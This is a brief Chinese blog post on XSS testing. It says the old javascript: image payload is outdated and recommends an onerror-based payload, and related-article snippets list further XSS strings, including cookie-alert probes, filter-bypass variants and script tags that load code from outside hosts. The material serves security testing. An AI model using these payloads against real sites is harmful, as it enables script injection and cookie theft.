<img src="javascript:alert(/xss/)">已经慢慢过时了的

最新推荐文章于 2025-07-11 23:02:31 发布
最新推荐文章于 2025-07-11 23:02:31 发布
阅读量1.6k 收藏
点赞数
分类专栏: xss
本文探讨了跨站脚本(XSS)攻击中一种特定技术的变化趋势。作者指出,随着浏览器安全性的提高,传统利用&lt;img&gt;标签进行XSS攻击的方式成功率逐渐降低。文章建议采用&lt;imgsrc=&quot;x&quot;/**/onerror=javascript:xxxx&gt;这一新方法,以适应当前主流浏览器的安全机制。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

我在一年前就发现类似<img src="javascript:alert(/xss/)">这种语句已经不能在IE7.0以上和火狐运行,而旧版的遨游和其他的一些IE内核浏览器还可以,估计是被开发人员故意封掉的。随着浏览器的更新换代,这种语句的成功率越来越低,我在网上找到一些新文章仍还是在使用。
建议还是早点习惯<img src="x"/**/onerror=javascript:xxxx>吧,这种方式绝大部分浏览器都可以执行。。
Web开发中Chrome DevTools攻略(深入理解和利用开发者工具、元素面板和控制台、网络和资源面板、应用和源代码面板等等)
半夏微凉科技
05-17 1375
Chrome开发者工具(DevTools)是Web开发中不可或缺的利器,它提供了一系列强大的功能,帮助开发人员调试、优化和审查网页。本文将深入探讨Chrome DevTools的各种功能和技巧,帮助你更好地利用这个工具来提升你的Web开发技能。
testXSS <img src="aa" onerror="javascript:alert('XSS');"/>
weixin_30329623的博客
05-07 147
adsa </p><img src="aa" onerror="javascript:alert('XSS');"/><p> 转载于:https://www.cnblogs.com/kuiyeit/p/6822093.html
javascript动态绑定imgsrc地址
abc1092008823的博客
10-02 3249
今天写了这么一段段代码:就是img标记中的scr地址需要调用javascript函数动态的绑定,起初写法如下:<img src="javascript:functionName()"> 浏览页面的时候却发现scr还是“javascript:functionName()” ,并不是函数返回的值,也就是说没有执行函数。 网上搜了一下有人写要写成这样<img src=...
html5+%3cimg+src,<script>alert(123)</script> <script>alert("hellox worldss");</script> javascript:al...
weixin_39728221的博客
06-15 371
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-->">'>alert(String.fromCharCod...
xss测试语句大全
hualusiyu的专栏
01-02 3095
'>alert(document.cookie) ='>alert(document.cookie) alert(document.cookie) alert(vulnerable) %3Cscript%3Ealert('XSS')%3C/script%3E alert('XSS') XSS')"> %0a%0aalert(\"Vulnerable\").jsp
XSS-labs靶场(超详解)1-20关——附原码
2201_76115387的博客
08-01 1712
alert(1)</script>,代码将变为echo "<h2 align=center>欢迎用户"<script>alert(1)
PHP后端开发:最新XSS防御技术深度剖析与实现
最新发布
大厂资深架构师
07-11 233
跨站脚本攻击(XSS)作为Web应用最常见且危害巨大的安全威胁之一,长期位居OWASP Top 10榜单前列。本文将带领PHP开发者深入探索XSS攻击的本质与最新防御技术,从原理剖析到实战编码,构建全方位的XSS防御体系。我们将系统讲解输入验证、输出编码、CSP策略等核心防御手段,并通过真实案例展示如何在PHP项目中落地实施这些安全措施。无论你是初涉Web安全的开发者,还是寻求提升系统安全性的架构师,本文都将为你提供一套完整的XSS防御解决方案,助你构建真正安全可靠的PHP应用。
【安全性挑战】:6种XSS攻击防御策略,保护你的iframe
本文首先概述了XSS攻击及其对系统的潜在影响,然后介绍了XSS攻击的类型、原理、载荷构造及执行机制。接着,文章强调了XSS攻击的检测与预防的重要性,并详细探讨了基础和高级的防御策略,包括输入验证、输出编码、...
2020年实用XSS Payload与攻防技巧
通过创建带有这些事件触发的恶意图片(如<img src=xonerror=alert()>)或隐藏元素,攻击者可以在用户触发这些事件时执行XSS代码。 尽管这份CheatSheet并非全面,但它提供了2020年研究者仍在使用的实用技术,旨在帮助...
XSS漏洞-常见标签
weixin_61143354的博客
09-17 1821
网络安全笔记
XSS 绕过常用语句
Mr.Huang_的博客
09-16 4225
XSS 绕过常用语句 写在最前面::: 下文中 alert 都可以由 prompt 代替 最常用的 XSS 漏洞测试代码: <script>prompt("XSS")</script> <SCRIPT SRC=http://damit5.ml/xss.js></SCRIPT> 在输入(Input)标签里 <INPUT type="text" value='<SCRIPT>alert("XSS")</SCRIPT>'>
XSS漏洞-03】XSS漏洞语句构造和绕过方法实例
m0_64378913的博客
05-14 4681
目录1 XSS语句构造方式1.1 第一种:利用[<>]构造HTML/JS语句1.2 第二种:利用javascript:伪协议1.3 第三种:事件驱动1.4 第四种:利用CSS(层叠样式脚本)1.5 其他标签及手法2 XSS语句变形及绕过2.1 第一种:大小写混编2.2 第二种:**双写绕过**。2.3 第三种:**引号的使用**2.4 第四种:使用 [/] 代替空格2.5 第五种:在一些关键字内插入回车符与Tab符2.6 第六种:编码绕过2.7 第七种:拆分跨站2.8
XSS攻击绕过方法大全,XSS攻击技巧,收集100种绕过方法分享(2024最新)
白帽黑客八哥的博客
12-12 1万+
尽管许多网站实施了输入过滤措施来防止跨站脚本(XSS)攻击,但在特定条件下,经过精心编码的脚本仍有可能实施XSS注入。本文旨在为专业的安全测试人员提供一个跨站脚本漏洞的检测指南。
浅析XSS(Cross Site Script:跨站式攻击)漏洞原理(转)
测试开发这些事
02-09 3305
 近一些人频频在博客里炫耀说黑了某某门户网站,发现了某某大站的漏洞,竟然还要收取发现漏洞的费用,仔细瞧了一瞧,全是一片噼里啪啦alert消息框的截图,只是简单的触发了XSS,心痒难耐,于是写了这篇拙文道出我对跨站脚本漏洞原理的一些理解。    如果你还不知道什么是XSS,我来帮助解释一下,XSS的全称是Cross Site Scripting,意思是跨站脚本.这第一个单词是Cross,为什么缩写成
XSS(跨站脚本攻击)详解
热门推荐
谢公子的博客
09-08 7万+
目录 XSS的原理和分类 XSS的攻击载荷 XSS可以插在哪里? XSS漏洞的挖掘 XSS的攻击过程 XSS漏洞的危害 XSS漏洞的简单攻击测试 反射型XSS: 存储型XSS: DOM型XSSXSS的简单过滤和绕过 ​XSS的防御 反射型XSS的利用姿势 get型 post型 利用JS将用户信息发送给后台 XSS的原理和分类 跨站脚本攻击XSS(Cros...
XSS的Waf绕过及工具使用(附靶场通关记录,持续更新)
m0_51468027的博客
02-01 6246
熟悉常见的waf绕过方法和工具使用,附靶场通关记录
<script src=http://xss.re/2809></script>
wo871329的专栏
02-28 590
XSS(跨站脚本攻击)
guowu666的博客
06-10 2943
xss基础
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值